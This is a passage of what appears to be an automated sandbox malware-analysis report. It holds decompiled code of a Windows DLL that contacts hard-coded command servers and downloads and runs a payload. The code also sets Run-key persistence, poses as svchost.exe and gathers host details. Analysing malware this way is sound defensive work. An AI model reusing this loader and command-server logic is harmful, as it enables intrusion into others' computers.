            				memset( &_v327, 0, _t56 << 2);
            				asm("stosw");
            				asm("stosb");
            				_t58 = 0x40;
            				_t67 =  &_v587;
            				memset(_t67, 0, 0 << 2);
            				_t68 = _t67 + _t58;
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v328, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
            				wsprintfA( &_v588, "c:\\windows\\system32\\drivers\\%s\\%s", 0x100165a4, 0x100165a8);
            				0x10038f08( &_v328, 0);
            				asm("insd");
            				E1000443D( &_v4684, 0x100165a4, 0, _t60,  &_v4684,  &_v588);
            				_push(L"Win32_process");
            				_push(L"ROOT\\CIMv2");
            				 *0x10015fd4 = 0;
            				_t47 = E10004D36(0x100165a4, 0, _t60, _t67 + _t58, 0, _t79, __fp0);
            				_t80 = _t47;
            				if(_t47 != 0) {
            					_push(_t47);
            					_push(0);
            					_t47 = E10029564(_t47, _t60, _t68, _t80, _t71, 0x1f0fff);
            					 *0x10015ff4 = _t47;
            					if(_t47 != 0) {
            						_t48 =  *0x10015fd8; // 0x0
            						 *_t48 = 0;
            						_t49 = CreateThread(0, 0, E10005620,  *0x10015fd8, 0, 0);
            						 *0x10015fd4 =  *0x10015fd4 + 1;
            						return _t49;
            					}
            				}
            				return _t47;
            			}
























            0x1000570f
            0x1000570f
            0x1000570f
            0x10005717
            0x1000571f
            0x10005724
            0x1000572a
            0x10005736
            0x10005738
            0x10005744
            0x1000574f
            0x10005751
            0x10005765
            0x10005767
            0x10005769
            0x10005771
            0x10005776
            0x1000577f
            0x10005788
            0x1000578f
            0x10005791
            0x10005793
            0x10005798
            0x10005799
            0x1000579f
            0x1000579f
            0x100057a1
            0x100057a3
            0x100057b1
            0x100057c5
            0x100057d4
            0x100057d9
            0x100057e8
            0x100057ed
            0x100057f2
            0x100057f7
            0x100057fd
            0x10005805
            0x10005807
            0x10005809
            0x1000580a
            0x10005811
            0x10005818
            0x1000581d
            0x1000581f
            0x10005826
            0x10005835
            0x1000583b
            0x00000000
            0x1000583b
            0x1000581d
            0x10005845

            APIs
            • wsprintfA.USER32 ref: 1000574F
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000537D
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000538A
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 10005393
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 100053A0
            • wsprintfA.USER32 ref: 100057B1
            • wsprintfA.USER32 ref: 100057C5
            • PrintFile.ABC(?,?,?,00000000,?,?,?,?,?,?,?,10016AE0,00000000,00080000,?,1000721D), ref: 100057E8
            • CreateThread.KERNEL32(00000000,00000000,10005620,00000000,00000000), ref: 10005835
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitializeThunk$wsprintf$CreateFilePrintThread
            • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
            • API String ID: 2056782399-1421401311
            • Opcode ID: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
            • Instruction ID: e048b07faf1ac040a4fa8706c71f0fbcae81103e39d27b5d28515d44bb65aaec
            • Opcode Fuzzy Hash: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
            • Instruction Fuzzy Hash: ED31A773910238BBEB21D7A4CC44FCF7B6DEB08746F1405A2F708FA051DB71AA858A91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 33%
            			E10005989(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, void* __fp0, intOrPtr _a16, intOrPtr _a20, signed int _a28) {
            				intOrPtr _t17;
            				void* _t20;
            				intOrPtr* _t39;
            
            				_t50 = __eflags;
            				_t32 = __edx;
            				_t27 = __ecx;
            				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
            				_push(__ecx);
            				_push(__ebx);
            				_push(__ebp);
            				_push(__esi);
            				_push(__edi);
            				wsprintfA(0x100165b0, "%s", "12071239");
            				0x10031e13();
            				 *_t34(0, 0x100165c8, 0x104);
            				 *_t34( *0x10016adc, 0x100166cc, 0x104);
            				E1000CD0E(_t27, 0x100167d0);
            				0x100426e9(0x100166cc);
            				asm("arpl [eax+0x57530020], ax");
            				wsprintfA(0x100168d4, "%s\\%s", 0x100167d0, 0x5c);
            				wsprintfA(0x100169d8, "%s\\version.txt", 0x100167d0);
            				_t17 = E1000CCAE(wsprintfA("F896SD5DAE", "M%s", "107.163.56.251:6658"), "12071239", _t27, _t32, 0x100167d0,  *0x1000e248, 0x100166cc, _t50, __fp0, 0x84);
            				_a16 = _t17;
            				_a28 = _a28 & 0x00000000;
            				_t51 = _t17;
            				if(_t17 == 0) {
            					_t39 = 0;
            					__eflags = 0;
            				} else {
            					_t27 = _t17;
            					_t39 = E10008A6A("12071239", _t17, _t32, _t51, __fp0);
            				}
            				_a28 = _a28 | 0xffffffff;
            				_t6 = _t39 + 0x44; // 0x44
            				E1000CD0E(_t27, 0x10016af0);
            				if(_t39 != 0) {
            					 *((intOrPtr*)( *_t39))(1);
            				}
            				_t20 = 1;
            				 *[fs:0x0] = _a20;
            				return _t20;
            			}






            0x10005989
            0x10005989
            0x10005989
            0x1000598e
            0x10005993
            0x10005994
            0x10005995
            0x10005996
            0x100059a2
            0x100059ae
            0x100059b1
            0x100059c6
            0x100059d5
            0x100059de
            0x100059e6
            0x100059eb
            0x100059fb
            0x10005a08
            0x10005a20
            0x10005a28
            0x10005a2c
            0x10005a31
            0x10005a33
            0x10005a40
            0x10005a40
            0x10005a35
            0x10005a35
            0x10005a3c
            0x10005a3c
            0x10005a42
            0x10005a47
            0x10005a50
            0x10005a59
            0x10005a61
            0x10005a61
            0x10005a69
            0x10005a6e
            0x10005a76

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: wsprintf
            • String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12071239$F896SD5DAE$M%s
            • API String ID: 2111968516-4006945637
            • Opcode ID: c285b52f04845b3a5ddf97e236d1c823dd400fbe2074583f7b88738120a81b70
            • Instruction ID: 79abf1e2baf1fb729ca166858087dd68efaefcd5263c4161144b64841660d7f9
            • Opcode Fuzzy Hash: c285b52f04845b3a5ddf97e236d1c823dd400fbe2074583f7b88738120a81b70
            • Instruction Fuzzy Hash: 741136366003287BF210E7959C45F6F7F5CDF896A6F01412AF700AE181DB72E8808B66
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
            • API String ID: 2994545307-1569318151
            • Opcode ID: 6495203b3a7a723168cc2296d43cec07435a7eea9f24a85f0b27764c02e7c442
            • Instruction ID: 60b119b73ed59b85f20aa855cf1e8ee1c5a7c8f5b848a72e73bb8641c22c9667
            • Opcode Fuzzy Hash: 6495203b3a7a723168cc2296d43cec07435a7eea9f24a85f0b27764c02e7c442
            • Instruction Fuzzy Hash: 8C316FB690065CBAEB11DBA4CC45FDF7F7DEF08341F4400A6F208AA181E7316A458EA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 62%
            			E10005DB4(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
            				char _v3;
            				char _v8;
            				intOrPtr _v12;
            				char _v16;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				char _v80;
            				void _v128;
            				void _v383;
            				signed char _v384;
            				char _v644;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				void* _t31;
            				void* _t44;
            				signed short _t49;
            				void* _t54;
            				signed int _t59;
            				void* _t62;
            				void* _t63;
            				signed int _t64;
            				void* _t67;
            				void* _t70;
            				intOrPtr _t71;
            				void* _t74;
            				void* _t77;
            				intOrPtr _t78;
            				char* _t81;
            				void* _t88;
            
            				_t88 = __eflags;
            				_t70 = __edx;
            				_t59 = 0xc;
            				_t77 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0";
            				_t31 = memcpy( &_v128, _t77, _t59 << 2);
            				_t74 = _t77 + _t59 + _t59;
            				0x10032624(0x80000002,  &_v128, 0, 0xf003f,  &_v8);
            				asm("sbb [ebp-0x72b68a40], al");
            				_t81 =  &_v3;
            				asm("clc");
            				_v16 = 4;
            				_v12 = 0xc8;
            				E1000409D(_v8, "ProcessorNameString", 0,  &_v16,  &_v644, _t31);
            				E10004092(_v8);
            				_t78 = _a4;
            				_push( &_v644);
            				E1000CD0E(0, _t78);
            				E100058A4(0, _t78);
            				_t13 = _t78 + 0x60; // 0x128
            				E10005ACA(_t88, _t13);
            				_pop(_t62);
            				_v80 = 0x40;
            				E1002BB01( &_v80, __ebx, _t62, _t70, _t74, _t78, _t88);
            				_t71 = _v68;
            				_t63 = 0x14;
            				_t44 = E1000CDB0(_v72, _t63, _t71);
            				asm("adc edx, 0x0");
            				_t18 = _t78 + 0x40; // 0x108
            				E10003EF4(_t18, "%u MB", _t44 + 1);
            				_t19 = _t78 + 0x80; // 0x148
            				_t49 = E1000CD0E(_t63, _t19);
            				0x1003e508("12071239", _t71, _t81,  &_v80);
            				_v384 = _v384 & 0x00000000;
            				 *(_t78 + 0x120) = _t49 & 0x0000ffff;
            				_t64 = 0x3f;
            				memset( &_v383, 0, _t64 << 2);
            				 *(_t78 + 0x124) =  *(_t78 + 0x124) | 0xffffffff;
            				asm("stosw");
            				asm("stosb");
            				_t54 = E10005CF7( &_v384, 0x100);
            				_t67 = _t81;
            				if(_t54 == 0) {
            					__eflags = _t78 + 0xa0;
            					return E10003EF4(_t78 + 0xa0, "%s", "http://107.163.56.232:18963/main.php");
            				}
            				_push( &_v384);
            				return E1000CD0E(_t67, _t78 + 0xa0);
            			}

































            0x10005db4
            0x10005db4
            0x10005dc4
            0x10005dc5
            0x10005dd9
            0x10005dd9
            0x10005de0
            0x10005de5
            0x10005deb
            0x10005dec
            0x10005ded
            0x10005e07
            0x10005e11
            0x10005e19
            0x10005e1e
            0x10005e27
            0x10005e29
            0x10005e44
            0x10005e49
            0x10005e4d
            0x10005e56
            0x10005e57
            0x10005e60
            0x10005e68
            0x10005e6d
            0x10005e6e
            0x10005e76
            0x10005e7b
            0x10005e84
            0x10005e89
            0x10005e95
            0x10005e9e
            0x10005ea3
            0x10005eaf
            0x10005eb5
            0x10005ebe
            0x10005ec0
            0x10005ecc
            0x10005ece
            0x10005ed6
            0x10005ede
            0x10005edf
            0x10005efd
            0x00000000
            0x10005f0e
            0x10005eed
            0x00000000

            APIs
            • ___crtGetTimeFormatEx.LIBCMT ref: 10005E11
              • Part of subcall function 1000409D: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040B2
              • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10006DCF,?), ref: 10004096
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CloseFormatQueryTimeValue___crt
            • String ID: %u MB$12071239$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
            • API String ID: 271660946-279254293
            • Opcode ID: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
            • Instruction ID: 4b44d42b6dd2e917ab233586d3a99f6710c87f88ea92407307b6f82172be36f0
            • Opcode Fuzzy Hash: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
            • Instruction Fuzzy Hash: 2531C2B680460CBAFB21C764DC42FDF77BCEB04340F14456AF658BA082EB75BA498B55
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E10008578(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				short _v32;
            				CHAR* _v72;
            				void _v76;
            				char _v80;
            				char _v96;
            				void _v355;
            				char _v356;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				intOrPtr _t20;
            				void* _t22;
            				void* _t24;
            				void* _t35;
            				void* _t36;
            				void* _t38;
            				signed int _t39;
            				signed int _t41;
            				void* _t43;
            				void* _t51;
            				void* _t57;
            
            				_t57 = __eflags;
            				_t43 = __edx;
            				_t38 = __ecx;
            				Sleep(0x2710);
            				_v12 = E10001000(_t38, _t57, __fp0, "aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=");
            				_t20 = E1000CCAE(_t19, _t36, _t38, _t43,  *0x1000e0b0, 0x300000, _t51, _t57, __fp0, 0x300000);
            				_push(0x300000);
            				_push(0);
            				_v8 = _t20;
            				E1000CCFC(0, _t38, 0x300000, _t51, _t57, _t20);
            				_t22 = E100061BD(_t38, 0x300000, _t57, __fp0, _v12, _v8, 0x300000);
            				_t50 = _t22;
            				if(_t22 <= 0) {
            					L1:
            					Sleep(0x1b7740);
            					goto L1;
            				}
            				_t39 = 0x40;
            				_v356 = 0;
            				_t24 = memset( &_v355, 0, _t39 << 2);
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v356, "c:\\%d.log", E1002DBAC(_t24, 0, _t43,  &_v355 + _t39, _t50, __eflags, __fp0));
            				E10006840( &_v356, _t43,  &_v356, _v8, _t50);
            				__eflags = 0;
            				_t41 = 0x10;
            				memset( &_v76, 0, _t41 << 2);
            				_v80 = 0x44;
            				_v72 = "wINsTA0\\dEFauLT";
            				_v32 = 0;
            				0x10036ac0(_t43, 0,  &_v356, 0, 0, 0, 0, 0, 0,  &_v80,  &_v96, 0);
            				_t35 = 1;
            				return _t35;
            			}



























            0x10008578
            0x10008578
            0x10008578
            0x1000858f
            0x100085a0
            0x100085a4
            0x100085ab
            0x100085ac
            0x100085ae
            0x100085b1
            0x100085bd
            0x100085c2
            0x100085c9
            0x100085cb
            0x100085d0
            0x00000000
            0x100085d0
            0x100085d8
            0x100085df
            0x100085e5
            0x100085e7
            0x100085e9
            0x100085fd
            0x1000860e
            0x10008616
            0x1000861d
            0x1000861e
            0x10008623
            0x1000863d
            0x10008644
            0x10008649
            0x10008650
            0x10008655

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleep$wsprintf
            • String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log$wINsTA0\dEFauLT
            • API String ID: 3195947292-2583752392
            • Opcode ID: 0810fa4d6b71a50b45236c33566878f9762d6c774f759de78f1c08ccf4ee19d6
            • Instruction ID: 80da11c417ec69a2b6a76b4d39b24a6af7efd0caae81726e88516388cc332cb8
            • Opcode Fuzzy Hash: 0810fa4d6b71a50b45236c33566878f9762d6c774f759de78f1c08ccf4ee19d6
            • Instruction Fuzzy Hash: 0E21D5B6C0021CBAEB11EBE4CC42EDFBB7CEF48390F140466F604BA141DA716E458BA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 55%
            			E10006D08(void* __eflags, void* __fp0) {
            				char _v8;
            				char _v12;
            				void _v271;
            				char _v272;
            				void _v531;
            				char _v532;
            				void* __esi;
            				signed int _t34;
            				void* _t50;
            
            				_t50 = __eflags;
            				_t34 = 0x40;
            				_v532 = 0;
            				memset( &_v531, 0, _t34 << 2);
            				asm("stosw");
            				asm("stosb");
            				E10003FF7(0x100166cc,  &_v532, 0x104);
            				E1000406C(0x80000001, E10001000(0, _t50, __fp0, "U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg=="), 0, "REG_SZ", 0, 0xf003f, 0,  &_v8,  &_v12);
            				_push(0x40);
            				_v272 = 0;
            				memset( &_v271, 0, 0 << 2);
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v272, "%s \"%s\",Dispatch", 0x100165c8, 0x100166cc);
            				_push( &_v272);
            				E100040D4(_v8, "Disp", 0, 1,  &_v272, E1000CD02(0, 0x100166cc) + 1);
            				return E10004092(_v8);
            			}












            0x10006d08
            0x10006d18
            0x10006d21
            0x10006d2c
            0x10006d2e
            0x10006d30
            0x10006d3e
            0x10006d6c
            0x10006d71
            0x10006d7c
            0x10006d83
            0x10006d85
            0x10006d87
            0x10006d99
            0x10006da5
            0x10006dbf
            0x10006dd4

            APIs
              • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
              • Part of subcall function 1000406C: RegCreateKeyExA.ADVAPI32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D71,?,10006D71,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
            • wsprintfA.USER32 ref: 10006D99
            • ___crtGetTimeFormatEx.LIBCMT ref: 10006DBF
              • Part of subcall function 100040D4: RegSetValueExA.ADVAPI32(00000001,?,00000001,00000000,?,?,?,10006DC4,?,Disp,00000000,00000001,?,00000001,?), ref: 100040E9
              • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10006DCF,?), ref: 10004096
            Strings
            • U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10006D5B
            • Disp, xrefs: 10006DB7
            • %s "%s",Dispatch, xrefs: 10006D93
            • REG_SZ, xrefs: 10006D55
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
            • String ID: %s "%s",Dispatch$Disp$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
            • API String ID: 1762869224-3950432356
            • Opcode ID: d0f372c4c36c380af209c7183de226d935087aaaefbf66ce19d7085485c3dcb4
            • Instruction ID: 37d86c3d472a3d605e7482a7a14943cafe3984fcf04a0d8964f0c82a610850ab
            • Opcode Fuzzy Hash: d0f372c4c36c380af209c7183de226d935087aaaefbf66ce19d7085485c3dcb4
            • Instruction Fuzzy Hash: 7D11B2B694421CBEFB11D7A4DC86FEA776CDB14344F1404B1F704BA085DAB16FC88AA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 16%
            			E10004351(void* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
            				void _v263;
            				char _v264;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				void* _t21;
            				void* _t23;
            				void* _t27;
            				signed int _t29;
            				void* _t31;
            				char* _t38;
            				void* _t40;
            				void* _t41;
            				signed int _t43;
            				void* _t48;
            				intOrPtr* _t49;
            				CHAR** _t52;
            				void* _t54;
            				intOrPtr* _t55;
            
            				_t60 = __fp0;
            				_t47 = __edx;
            				_t39 = __ecx;
            				_t52 = "cmd.exe";
            				0x10032ab5(__eax, _a8, _t52);
            				_t59 = __eax;
            				if(__eax == 0) {
            					__eflags = _a4 - E100267D4(__eax, __ecx, __edx, _t48, _t52, __eflags, __fp0);
            					if(__eflags != 0) {
            						E10004318(_t19, __ecx, _a4);
            						 *_t55 = 0x7d0;
            						Sleep(??);
            						_t38 = "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==";
            						_t21 = E10001000(_t39, __eflags, __fp0, _t38);
            						_pop(_t49);
            						0x10041fa9();
            						_pop(_t40);
            						 *_t49(_t21);
            						_t23 = E10001000(_t40, __eflags, __fp0, "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==");
            						_t41 = 1;
            						 *_t38(E100271E2(_t24, _t38, _t41, _t47), E10001000(_t41, __eflags, __fp0, _t38), _t23);
            						_t27 =  *_t49();
            						Sleep(0x3e8);
            						_t29 = E100290F2(_t27, _t38, _t54, _a8, _a8) & 0x00000085;
            						 *(_t55 + _t29 * 2 - 0x80) =  *(_t55 + _t29 * 2 - 0x80) << 0xa5;
            						asm("cld");
            						asm("invalid");
            						 *_t29 =  *_t29 + 1;
            						__eflags =  *_t29;
            						_t43 = 0x40;
            						__eflags = 0;
            						_t31 = memset( &_v263, 0, _t43 << 2);
            						asm("stosw");
            						asm("stosb");
            						0x10041377();
            						wsprintfA( &_v264, "%s.%d", _a8, _t31);
            						return  *_t38(_a8,  &_v264, 1);
            					}
            					_push("self");
            					L4:
            					_push(0);
            					return L10004139(_t39, _t47, _t59, _t60);
            				}
            				_push(_t52);
            				goto L4;
            			}























            0x10004351
            0x10004351
            0x10004351
            0x1000435c
            0x10004367
            0x1000436c
            0x1000436e
            0x10004379
            0x1000437c
            0x10004394
            0x1000439f
            0x100043a6
            0x100043a8
            0x100043ae
            0x100043b3
            0x100043b4
            0x100043b9
            0x100043bb
            0x100043c4
            0x100043c9
            0x100043d9
            0x100043de
            0x100043e5
            0x100043ef
            0x100043f1
            0x100043f6
            0x100043f7
            0x100043f9
            0x100043f9
            0x100043fd
            0x100043fe
            0x10004406
            0x10004408
            0x1000440a
            0x1000440b
            0x10004421
            0x00000000
            0x10004436
            0x1000437e
            0x10004383
            0x10004383
            0x00000000
            0x1000438b
            0x10004370
            0x00000000

            APIs
            • Sleep.KERNEL32(?,00000000,00000000,?,cmd.exe,100168D4,751443E0,00000000), ref: 100043A6
            • Sleep.KERNEL32(000003E8), ref: 100043E5
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleep
            • String ID: QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==$cmd.exe$self
            • API String ID: 3472027048-2620343502
            • Opcode ID: f80a028ce0456d96c9013e9b422283649f837558aaaf319a9c805c80896dde91
            • Instruction ID: b27527e00d161eb54cfb38a31ab8197fa4e33b6488c85d147b80e3c5571d821e
            • Opcode Fuzzy Hash: f80a028ce0456d96c9013e9b422283649f837558aaaf319a9c805c80896dde91
            • Instruction Fuzzy Hash: CF0126B64043547AFA11B778EC86F8F3B4CDF452E1F110422F94469089CEB9AA808665
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 41%
            			E10004630(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				char _v8;
            				intOrPtr _v12;
            				char _v16;
            				char _v275;
            				char _v276;
            				void _v535;
            				char _v536;
            				char _v812;
            				signed char _v856;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				char* _t47;
            				void* _t53;
            				intOrPtr _t57;
            				void* _t59;
            				signed int _t66;
            				signed int _t68;
            				void* _t70;
            				void* _t73;
            				void* _t74;
            				void* _t75;
            				void* _t77;
            				void* _t78;
            				void* _t80;
            				void* _t87;
            
            				_t87 = __fp0;
            				_t70 = __edx;
            				_t66 = 0x40;
            				_v536 = 0;
            				memset( &_v535, 0, _t66 << 2);
            				asm("stosw");
            				asm("stosb");
            				E1000CD0E(0,  &_v536);
            				E1000CD08(0,  &_v536);
            				_t80 = _t78 + 0x1c;
            				_t47 =  &_v536;
            				0x10031a18(_t47,  &_v856, "\\*.*", _a4);
            				asm("insd");
            				_v12 = _t47;
            				if(_t47 != 0xffffffff) {
            					_push(_t75);
            					do {
            						_t68 = 0x40;
            						_t73 =  &_v275;
            						_v276 = 0;
            						memset(_t73, 0, _t68 << 2);
            						_t74 = _t73 + _t68;
            						asm("stosw");
            						asm("stosb");
            						wsprintfA( &_v276, "%s\\%s", _a4,  &_v812);
            						_push(_a12);
            						_t53 = E1000CD02(0, _t75);
            						_t80 = _t80 + 0x20;
            						_t75 = _t77 + _t53 - 0x10f;
            						if((_v856 & 0x00000010) == 0) {
            							_v16 = 0;
            							_v8 = 0;
            							_t57 = E10004564(0, _t70, __eflags, _t87,  &_v8,  &_v276,  &_v16);
            							_t80 = _t80 + 0xc;
            							__eflags = _t57;
            							if(__eflags == 0) {
            								goto L9;
